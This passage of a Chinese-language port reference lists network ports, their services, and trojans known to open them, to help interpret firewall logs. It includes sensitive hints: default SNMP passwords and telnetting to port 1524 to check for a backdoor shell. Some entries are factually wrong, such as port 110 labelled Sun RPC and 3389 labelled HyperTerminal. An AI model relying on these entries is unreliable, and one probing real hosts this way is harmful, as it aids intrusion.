modem的防火牆常會看見大量發送到廣播地址255.255.255.255的數據。這些機器在向DHCP伺服器請求一個地址。HACKER常進入它們,分配一個地址把自己作為局部路由器而發起大量中間人(man-in-middle)攻擊。客戶端向68埠廣播請求配置,伺服器向67埠廣播回應請求。這種回應使用廣播是因為客戶端還不知道可以發送的IP地址。 埠:69 服務:Trival File Transfer 說明:許多伺服器與bootp一起提供這項服務,便於從系統下載啟動代碼。但是它們常常由於錯誤配置而使入侵者能從系統中竊取任何 文件。它們也可用於系統寫入文件。 埠:79 服務:Finger Server 說明:入侵者用於獲得用戶信息,查詢操作系統,探測已知的緩沖區溢出錯誤,回應從自己機器到其他機器Finger掃描。 埠:80 服務:HTTP 說明:用於網頁瀏覽。木馬Executor開放此埠。 埠:88 說明:Kerberos krb5。另外TCP的88埠也是這個用途。 埠:99 服務:Metagram Relay 說明:後門程序ncx99開放此埠。 埠:102 服務:Message transfer agent(MTA)-X.400 over TCP/IP 說明:消息傳輸代理。 埠:109 服務:Post Office Protocol -Version3 說明:POP3伺服器開放此埠,用於接收郵件,客戶端訪問伺服器端的郵件服務。POP3服務有許多公認的弱點。關於用戶名和密碼交 換緩沖區溢出的弱點至少有20個,這意味著入侵者可以在真正登陸前進入系統。成功登陸後還有其他緩沖區溢出錯誤。 埠:110 服務:SUN公司的RPC服務所有埠 說明:常見RPC服務有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等 埠:113 服務:Authentication Service 說明:這是一個許多計算機上運行的協議,用於鑒別TCP連接的用戶。使用標準的這種服務可以獲得許多計算機的信息。但是它可作為許多服務的記錄器,尤其是FTP、POP、IMAP、SMTP和IRC等服務。通常如果有許多客戶通過防火牆訪問這些服務,將會看到許多這個埠的連接請求。記住,如果阻斷這個埠客戶端會感覺到在防火牆另一邊與E-MAIL伺服器的緩慢連接。許多防火牆支持TCP連接的阻斷過程中發回RST。這將會停止緩慢的連接。 埠:119 服務:Network News Transfer Protocol 說明:NEWS新聞組傳輸協議,承載USENET通信。這個埠的連接通常是人們在尋找USENET伺服器。多數ISP限制,只有他們的客戶才能訪問他們的新聞組伺服器。打開新聞組伺服器將允許發/讀任何人的帖子,訪問被限制的新聞組伺服器,匿名發帖或發送SPAM。 埠:135 服務:Location Service 說明:Microsoft在這個埠運行DCE RPC end-point mapper為它的DCOM服務。這與UNIX 111埠的功能很相似。使用DCOM和RPC的服務利用計算機上的end-point mapper注冊它們的位置。遠端客戶連接到計算機時,它們查找end-point mapper找到服務的位置。HACKER掃描計算機的這個埠是為了找到這個計算機上運行Exchange Server嗎?什麼版本?還有些DOS攻擊直接針對這個埠。 埠:137、138、139 服務:NETBIOS Name Service 說明:其中137、138是UDP埠,當通過網上鄰居傳輸文件時用這個埠。而139埠:通過這個埠進入的連接試圖獲得NetBIOS/SMB服務。這個協議被用於windows文件和列印機共享和SAMBA。還有WINS Regisrtation也用它。 埠:143 服務:Interim Mail Access Protocol v2 說明:和POP3的安全問題一樣,許多IMAP伺服器存在有緩沖區溢出漏洞。記住:一種LINUX蠕蟲(admv0rm)會通過這個埠繁殖,因此許多這個埠的掃描來自不知情的已經被感染的用戶。當REDHAT在他們的LINUX發布版本中默認允許IMAP後,這些漏洞變的很流行。這一埠還被用於IMAP2,但並不流行。 埠:161 服務:SNMP 說明:SNMP允許遠程管理設備。所有配置和運行信息的儲存在資料庫中,通過SNMP可獲得這些信息。許多管理員的錯誤配置將被暴露在Internet。Cackers將試圖使用默認的密碼public、private訪問系統。他們可能會試驗所有可能的組合。SNMP包可能會被錯誤的指向用戶的網路。 埠:162 說明:SNMP Trap(SNMP陷阱) 埠:177 服務:X Display Manager Control Protocol 說明:許多入侵者通過它訪問X-windows操作台,它同時需要打開6000埠。 埠:389 服務:LDAP、ILS 說明:輕型目錄訪問協議和NetMeeting Internet Locator Server共用這一埠。 埠:443 服務:Https 說明:網頁瀏覽埠,能提供加密和通過安全埠傳輸的另一種HTTP。 埠:445 說明:Common Internet File System(CIFS)(公共Internet文件系統) 埠:456 服務:[NULL] 說明:木馬HACKERS PARADISE開放此埠。 埠:464 說明:Kerberos kpasswd(v5)。另外TCP的464埠也是這個用途。 埠:500 說明:Internet Key Exchange(IKE)(Internet密鑰交換) 埠:513 服務:Login,remote login 說明:是從使用cable modem或DSL登陸到子網中的UNIX計算機發出的廣播。這些人為入侵者進入他們的系統提供了信息。 埠:544 服務:[NULL] 說明:kerberos kshell 埠:548 服務:Macintosh,File Services(AFP/IP) 說明:Macintosh,文件服務。 埠:553 服務:CORBA IIOP (UDP) 說明:使用cable modem、DSL或VLAN將會看到這個埠的廣播。CORBA是一種面向對象的RPC系統。入侵者可以利用這些信息進入系統。 埠:555 服務:DSF 說明:木馬PhAse1.0、Stealth Spy、IniKiller開放此埠。 埠:568 服務:Membership DPA 說明:成員資格 DPA。 埠:569 服務:Membership MSN 說明:成員資格 MSN。 埠:635 服務:mountd 說明:Linux的mountd Bug。這是掃描的一個流行BUG。大多數對這個埠的掃描是基於UDP的,但是基於TCP的mountd有所增加(mountd同時運行於兩個埠)。記住mountd可運行於任何埠(到底是哪個埠,需要在埠111做portmap查詢),只是Linux默認埠是635,就像NFS通常運行於2049埠。 埠:636 服務:LDAP 說明:SSL(Secure Sockets layer) 埠:666 服務:Doom Id Software 說明:木馬Attack FTP、Satanz Backdoor開放此埠 埠:993 服務:IMAP 說明:SSL(Secure Sockets layer) 埠:1001、1011 服務:[NULL] 說明:木馬Silencer、WebEx開放1001埠。木馬Doly Trojan開放1011埠。 埠:1024 服務:Reserved 說明:它是動態埠的開始,許多程序並不在乎用哪個埠連接網路,它們請求系統為它們分配下一個閑置埠。基於這一點分配從埠1024開始。這就是說第一個向系統發出請求的會分配到1024埠。你可以重啟機器,打開Telnet,再打開一個窗口運行natstat -a 將會看到Telnet被分配1024埠。還有SQL session也用此埠和5000埠。 埠:1025、1033 服務:1025:network blackjack 1033:[NULL] 說明:木馬netspy開放這2個埠。 埠:1080 服務:SOCKS 說明:這一協議以通道方式穿過防火牆,允許防火牆後面的人通過一個IP地址訪問INTERNET。理論上它應該只允許內部的通信向外到達INTERNET。但是由於錯誤的配置,它會允許位於防火牆外部的攻擊穿過防火牆。WinGate常會發生這種錯誤,在加入IRC聊天室時常會看到這種情況。 埠:1170 服務:[NULL] 說明:木馬Streaming Audio Trojan、Psyber Stream Server、Voice開放此埠。 埠:1234、1243、6711、6776 服務:[NULL] 說明:木馬SubSeven2.0、Ultors Trojan開放1234、6776埠。木馬SubSeven1.0/1.9開放1243、6711、6776埠。 埠:1245 服務:[NULL] 說明:木馬Vodoo開放此埠。 埠:1433 服務:SQL 說明:Microsoft的SQL服務開放的埠。 埠:1492 服務:stone-design-1 說明:木馬FTP99CMP開放此埠。 埠:1500 服務:RPC client fixed port session queries 說明:RPC客戶固定埠會話查詢 埠:1503 服務:NetMeeting T.120 說明:NetMeeting T.120 埠:1524 服務:ingress 說明:許多攻擊腳本將安裝一個後門SHELL於這個埠,尤其是針對SUN系統中Sendmail和RPC服務漏洞的腳本。如果剛安裝了防火牆就看到在這個埠上的連接企圖,很可能是上述原因。可以試試Telnet到用戶的計算機上的這個埠,看看它是否會給你一個SHELL。連接到600/pcserver也存在這個問題。 埠:1600 服務:issd 說明:木馬Shivka-Burka開放此埠。 埠:1645、1812 說明:Remot Authentication Dial-In User Service(RADIUS)authentication(Routing and Remote Access)(遠程認證撥號用戶服務) 埠:1646、1813 說明:RADIUS accounting(Routing and Remote Access)(RADIUS記帳(路由和遠程訪問)) 埠:1701 說明:Layer Two Tunneling Protocol(L2TP)(第2層隧道協議) 埠:1720 服務:NetMeeting 說明:NetMeeting H.233 call Setup。 埠:1731 服務:NetMeeting Audio Call Control 說明:NetMeeting音頻調用控制。 埠:1801、3527 說明:Microsoft Message Queue Server(Microsoft消息隊列伺服器)。還有TCP的135、1801、2101、2103、2105也是同樣的用途。 埠:1807 服務:[NULL] 說明:木馬SpySender開放此埠。 埠:1981 服務:[NULL] 說明:木馬ShockRave開放此埠。 埠:1999 服務:cisco identification port 說明:木馬BackDoor開放此埠。 埠:2000 服務:[NULL] 說明:木馬GirlFriend 1.3、Millenium 1.0開放此埠。 埠:2001 服務:[NULL] 說明:木馬Millenium 1.0、Trojan Cow開放此埠。 埠:2023 服務:xinuexpansion 4 說明:木馬Pass Ripper開放此埠。 埠:2049 服務:NFS 說明:NFS程序常運行於這個埠。通常需要訪問Portmapper查詢這個服務運行於哪個埠。 埠:2115 服務:[NULL] 說明:木馬Bugs開放此埠。 埠:2140、3150 服務:[NULL] 說明:木馬Deep Throat 1.0/3.0開放此埠。 埠:2500 服務:RPC client using a fixed port session replication 說明:應用固定埠會話復制的RPC客戶 埠:2504 說明:Network Load Balancing(網路平衡負荷) 埠:2583 服務:[NULL] 說明:木馬Wincrash 2.0開放此埠。 埠:2801 服務:[NULL] 說明:木馬Phineas Phucker開放此埠。 埠:3024、4092 服務:[NULL] 說明:木馬WinCrash開放此埠。 埠:3128 服務:squid 說明:這是squid HTTP代理伺服器的默認埠。攻擊者掃描這個埠是為了搜尋一個代理伺服器而匿名訪問Internet。也會看到搜索其他代理伺服器的埠8000、8001、8080、8888。掃描這個埠的另一個原因是用戶正在進入聊天室。其他用戶也會檢驗這個埠以確定用戶的機器是否支持代理。 埠:3129 服務:[NULL] 說明:木馬Master Paradise開放此埠。 埠:3150 服務:[NULL] 說明:木馬The Invasor開放此埠。 埠:3210、4321 服務:[NULL] 說明:木馬SchoolBus開放此埠 埠:3333 服務:dec-notes 說明:木馬Prosiak開放此埠 埠:3389 服務:超級終端 說明:WINDOWS 2000終端開放此埠。 埠:3700 服務:[NULL] 說明:木馬Portal of Doom開放此埠 埠:3996、4060 服務:[NULL] 說明:木馬RemoteAnything開放此埠 埠:4000 服務:QQ客戶端 說明:騰訊QQ客戶端開放此埠。 埠:4092 服務:[NULL] 說明:木馬WinCrash開放此埠。 埠:4590 服務:[NULL] 說明:木馬ICQTrojan開放此埠。 埠:5000、5001、5321、50505 服務:[NULL] 說明:木馬blazer5開放5000埠。木馬Sockets de Troie開放5000、5001、5321、50505埠。 埠:5400、5401、5402 服務:[NULL] 說明:木馬Blade Runner開放此埠。 埠:5550 服務:[NULL] 說明:木馬xtcp開放此埠。 埠:5569 服務:[NULL] 說明:木馬Robo-Hack開放此埠。 埠:5632 服務:pcAnywere 說明:有時會看到很多這個埠的掃描,這依賴於用戶所在的位置。當用戶打開pcAnywere時,它會自動掃描區域網C類網以尋找可能的代理(這里的代理是指agent而不是proxy)。入侵者也會尋找開放這種服務的計算機。,所以應該查看這種掃描的源地址。一些搜尋pcAnywere的掃描包常含埠22的UDP數據包。 埠:5742 服務:[NULL] 說明:木馬WinCrash1.03開放此埠。 埠:6267 服務:[NULL] 說明:木馬廣外女生開放此埠。 埠:6400 服務:[NULL] 說明:木馬The tHing開放此埠。 埠:6670、6671 服務:[NULL] 說明:木馬Deep Throat開放6670埠。而Deep Throat 3.0開放6671埠。 埠:6883 服務:[NULL] 說明:木馬DeltaSource開放此埠。 埠:6969 服務:[NULL] 說明:木馬Gatecrasher、Priority開放此埠。 埠:6970 服務:RealAudio 說明:RealAudio客戶將從伺服器的6970-7170的UDP埠接收音頻數據流。這是由TCP-7070埠外向控制連接設置的。 埠:7000 服務:[NULL] 說明:木馬Remote Grab開放此埠。 埠:7300、7301、7306、7307、7308 服務:[NULL] 說明:木馬NetMonitor開放此埠。另外NetSpy1.0也開放7306埠。 埠:7323 服務:[NULL] 說明:Sygate伺服器端。 埠:7626 服務:[NULL] 說明:木馬Giscier開放此埠。 埠:7789 服務:[NULL] 說明:木馬ICKiller開放此埠。 埠:8000 服務:OICQ 說明:騰訊QQ伺服器端開放此埠。 埠:8010 服務:Wingate 說明:Wingate代理開放此埠。 埠:8080 服務:代理埠 說明:WWW代理開放此埠。 埠:9400、9401、9402 服務:[NULL] 說明:木馬Incommand 1.0開放此埠。 埠:9872、9873、9874、9875、10067、10167 服務:[NULL] 說明:木馬Portal of Doom開放此埠。 埠:9989 服務:[NULL] 說明:木馬iNi-Killer開放此埠。 埠:11000 服務:[NULL] 說明:木馬SennaSpy開放此埠。 埠:11223 服務:[NULL] 說明:木馬Progenic trojan開放此埠。 埠:12076、61466 服務:[NULL] 說明:木馬Telecommando開放此埠。 埠:12223 服務:[NULL] 說明:木馬Hack\\\』99 KeyLogger開放此埠。 埠:12345、12346 服務:[NULL] 說明:木馬NetBus1.60/1.70、GabanBus開放此埠。 埠:12361 服務:[NULL] 說明:木馬Whack-a-mole開放此埠。 埠:13223 服務:PowWow 說明:PowWow是Tribal Voice的聊天程序。它允許用戶在此埠打開私人聊天的連接。這一程序對於建立連接非常具有攻擊性。它會駐扎在這個TCP埠等回應。造成類似心跳間隔的連接請求。如果一個撥號用戶從另一個聊天者手中繼承了IP地址就會發生好象有很多不同的人在測試這個埠的情況。這一協議使用OPNG作為其連接請求的前4個位元組。 埠:16969 服務:[NULL] 說明:木馬Priority開放此埠。 埠:17027 服務:Concent 說明:這是一個外向連接。這是由於公司內部有人安裝了帶有Concent"adbot"的共享軟體。Concent"adbot"是為共享軟體顯示廣告服務的。使用這種服務的一種流行的軟體是Pkware。 埠:19191 服務:[NULL] 說明:木馬藍色火焰開放此埠。 埠:20000、20001 服務:[NULL] 說明:木馬Millennium開放此埠。 埠:20034 服務:[NULL] 說明:木馬NetBus Pro開放此埠。 埠:21554 服務:[NULL] 說明:木馬GirlFriend開放此埠。 埠:22222 服務:[NULL] 說明:木馬Prosiak開放此埠。 埠:23456 服務:[NULL] 說明:木馬Evil FTP、Ugly FTP開放此埠。 埠:26274、47262 服務:[NULL] 說明:木馬Delta開放此埠。 埠:27374 服務:[NULL] 說明:木馬Subseven 2.1開放此埠。 埠:30100 服務:[NULL] 說明:木馬NetSphere開放此埠。 埠:30303 服務:[NULL] 說明:木馬Socket23開放此埠。 埠:30999 服務:[NULL] 說明:木馬Kuang開放此埠。 埠:31337、31338 服務:[NULL] 說明:木馬BO(Back Orifice)開放此埠。另外木馬DeepBO也開放31338埠。 埠:31339 服務:[NULL] 說明:木馬NetSpy DK開放此埠。 埠:31666 服務:[NULL] 說明:木馬BOWhack開放此埠。 埠:33333 服務:[NULL] 說明:木馬Prosiak開放此埠。 埠:34324 服務:[NULL] 說明:木馬Tiny Telnet Server、BigGluck、TN開放此埠。 埠:40412 服務:[NULL] 說明:木馬The Spy開放此埠。 埠:40421、40422、40423、40426、 服務:[NULL] 說明:木馬Masters Paradise開放此埠。 埠:43210、54321 服務:[NULL] 說明:木馬SchoolBus 1.0/2.0開放此埠。 埠:44445 服務:[NULL] 說明:木馬Happypig開放此埠。 埠:50766 服務:[NULL] 說明:木馬Fore開放此埠。 埠:53001 服務:[NULL] 說明:木馬Remote Windows Shutdown開放此埠。 埠:65000 服務:[NULL] 說明:木馬Devil 1.03開放此埠。